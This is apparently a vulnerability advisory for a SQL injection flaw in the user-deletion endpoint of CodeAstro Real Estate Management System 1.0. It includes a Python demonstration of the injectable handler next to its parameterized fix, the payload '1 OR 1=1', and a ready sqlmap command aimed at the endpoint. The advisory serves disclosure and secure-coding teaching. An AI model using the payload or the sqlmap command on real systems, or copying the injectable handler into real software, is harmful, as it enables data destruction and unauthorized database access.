CodeAstro Real Estate Management System SQL Injection Vulnerability in User Deletion Endpoint

Vulnerability

A SQL injection vulnerability has been identified in CodeAstro Real Estate Management System version 1.0. The flaw is in the administrator endpoint '/admin/userdelete.php', where the 'id' parameter is not properly validated or sanitized before it is used in a database query, so a crafted value can change the logic of that query. The vulnerability is exploitable remotely, but only by an authenticated user with access to the admin panel.

Impact

Successful exploitation lets an attacker inject SQL into the query behind the user deletion endpoint. Depending on the database privileges of the application account and the database configuration, this can lead to unauthorized reading of data, modification or deletion of data beyond the single intended record, or execution of administrative operations on the database.

Reproduction

To reproduce this vulnerability, log in as a user with access to the admin panel and send a request to the user deletion endpoint '/admin/userdelete.php' with a crafted 'id' parameter. Because the parameter is not sanitized, SQL fragments placed in it are interpreted as part of the query. This can be done manually or with an automated tool such as sqlmap, pointed at the endpoint URL with 'id' as the tested parameter and supplied with the authenticated session cookie, since the endpoint is not reachable without a valid admin session.
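The following is an added, illustrative model of the flaw described above, not code from CodeAstro Real Estate Management System (whose endpoint is written in PHP and is not reproduced on this page). It assumes the endpoint builds a DELETE statement with the 'id' parameter, which the advisory does not state; the table name 'users', the column names, the seed rows and the tautology payload are all constructed for the example. The vulnerable handler interpolates the parameter into the statement, so a payload such as '1 OR 1=1' deletes every user instead of one; the hardened handler rejects non-integer input and binds the value as a query parameter.

```python
"""Model of an injectable user-deletion handler and its hardened form.

Illustrative example only: it does not reproduce the project's PHP code. It
uses an in-memory SQLite database so it runs offline.
"""
import sqlite3

# Constructed sample data, not taken from the affected application.
SEED_USERS = [(1, "alice"), (2, "bob"), (3, "carol")]


def fresh_db():
    """Return a new in-memory database seeded with SEED_USERS."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL)")
    conn.executemany("INSERT INTO users (id, username) VALUES (?, ?)", SEED_USERS)
    conn.commit()
    return conn


def delete_user_vulnerable(conn, user_id):
    """Hypothetical reconstruction of the flawed pattern.

    The request parameter is interpolated straight into the statement, so
    whatever the caller supplies is parsed by the database as SQL.
    """
    sql = f"DELETE FROM users WHERE id = {user_id}"
    cur = conn.execute(sql)
    conn.commit()
    return cur.rowcount  # number of rows actually deleted


def delete_user_fixed(conn, user_id):
    """Hardened form: validate the type, then bind the value as a parameter.

    Binding alone already stops the injection, because the driver sends the
    value separately from the statement text; the integer check additionally
    rejects junk input early with a clear error instead of a silent no-op.
    """
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        raise ValueError("id must be an integer")
    cur = conn.execute("DELETE FROM users WHERE id = ?", (uid,))
    conn.commit()
    return cur.rowcount


def remaining_users(conn):
    """Usernames still present, in id order."""
    return [row[0] for row in conn.execute("SELECT username FROM users ORDER BY id")]


def run_scenarios(payload="1 OR 1=1"):
    """Run the tautology payload against both handlers and report the outcome."""
    results = {}

    conn = fresh_db()
    results["vulnerable_deleted"] = delete_user_vulnerable(conn, payload)
    results["vulnerable_remaining"] = remaining_users(conn)

    conn = fresh_db()
    try:
        delete_user_fixed(conn, payload)
        results["fixed_rejected"] = False
    except ValueError:
        results["fixed_rejected"] = True
    results["fixed_remaining"] = remaining_users(conn)

    # A legitimate request still works against the hardened handler.
    results["fixed_legit_deleted"] = delete_user_fixed(conn, "2")
    results["fixed_legit_remaining"] = remaining_users(conn)
    return results


if __name__ == "__main__":
    for key, value in run_scenarios().items():
        print(f"{key}: {value}")
```

Running the block shows the vulnerable handler deleting all three seeded rows for a single request, while the hardened handler rejects the payload and leaves the table untouched. For the automated route mentioned above, and assuming the parameter is passed in the query string (the advisory does not say), sqlmap can be pointed at the endpoint with `sqlmap -u "http://TARGET/admin/userdelete.php?id=1" -p id --cookie="<admin session cookie>"`; note that sqlmap's test requests against a deletion endpoint may themselves delete records, so run it only against a disposable copy of the application.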

Added: Dec 19, 2025, 1:19 AM
Updated: Dec 19, 2025, 1:19 AM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 5.0
exploitability: 6.1
remediation: 0.0
relevance: 1.4
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.